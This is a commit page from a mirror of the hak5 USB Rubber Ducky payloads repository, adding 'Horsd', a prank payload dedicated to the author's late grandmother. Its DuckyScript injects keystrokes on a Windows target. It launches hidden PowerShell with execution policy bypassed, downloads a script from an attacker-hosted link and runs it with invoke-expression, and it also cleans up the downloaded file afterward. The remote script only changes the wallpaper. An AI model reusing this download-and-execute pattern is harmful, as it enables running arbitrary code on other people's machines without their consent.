hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Commit Horsd payload

pull/322/head
Rayden 2023-05-10 04:30:53 +10:00
parent 094434e61c
commit 3764def08d
No known key found for this signature in database
GPG Key ID: CC3FFEC64F1DEF2D
3 changed files with 57 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
payloads/library/prank/Horsd/README.md Normal file
View File

@ -0,0 +1,3 @@
# Horsd - In memorium to my Nan
Changes the target users background to a picture of a brown horse running, a nod to my nan's laptop background.
** This script requires very minor configuration found on LN:23 of the payload, set your own direct access link to the horsd.ps1 powershell script.

18
payloads/library/prank/Horsd/horsd.ps1 Normal file
View File

@ -0,0 +1,18 @@
$Image="%UserProfile%/horse.jpg"
$code = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
add-type $code
[Win32.Wallpaper]::SetWallpaper($Image)

36
payloads/library/prank/Horsd/payload.txt Normal file
View File

@ -0,0 +1,36 @@
REM Title: Horsd
REM Author: MocconaCoffee
REM Description: A simple script that will change the users wallpaper to Brown Horse that is running.
REM Dedicated to: This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
REM Target OS: Windows 10
REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
DELAY 3000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
ENTER
DELAY 100
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 300
REM ### REQUIRES CONFIGURATION ###
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <your own hosted link here>/horsd.ps1?dl=1; invoke-expression $pl
REM ### ---------------------- ###
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Remove-Item horse.jpg
ENTER
DELAY 300
STRING exit
ENTER